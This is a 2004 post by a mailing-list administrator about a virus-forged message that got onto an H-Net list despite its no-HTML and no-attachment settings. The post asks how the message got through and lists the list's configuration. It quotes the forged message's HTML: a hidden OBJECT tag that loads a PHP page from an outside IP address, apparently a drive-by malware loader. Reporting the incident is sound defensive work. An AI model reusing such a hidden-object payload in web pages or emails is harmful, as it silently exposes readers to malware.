Over the weekend, the following was posted to one of our lists. It was presumably forged by a virus; the From address was a legit editor of the list. I've filed off the e-mail addresses on general principle. Date: Sun, 21 Mar 2004 01:44:56 -0800 Reply-To: ... Sender: ... From: ... Subject: Incoming message MIME-Version: 1.0 Content-Type: text/html; charset=us-ascii Content-Transfer-Encoding: 7bit <html><body> <font face="System"> <OBJECT STYLE="display:none" DATA="http://66.169.99.119:81/563373.php"> </OBJECT></body></html> The list in question in set "Attachments= No" and "Language= NoHTML". The header appears below. Anyone have a suggestion about how it got posted? I'd like to close the leak. Dennis Boone H-Net * List-ID= H-ANNOUNCE * Ack= Yes * Attachments= No * Auto-Delete= yes,semi-auto,delay(5),max(100),Probe(15) * Change-Log= Yes * Confidential= No * Daily-Threshold= 50 * Default-Options= FullHdr,Repro,MIME * Delivery-Pool= P,C * Digest=yes,same,daily,00:00,size(2000) * Editor-Header= Yes * Errors-To= ... * Files= No * Language= NoHTML * Newsgroups= None * Notebook= Yes,/lists/h-announce,Weekly,(H-ANNOUNCE) * Notify= Yes * Renewal= None * Reply-to= List,Respect * Review= Owner * Send= Editor * Stats= Normal,Private * Subscription= open,confirm * Validate= No * Editor= ... * Owner= ...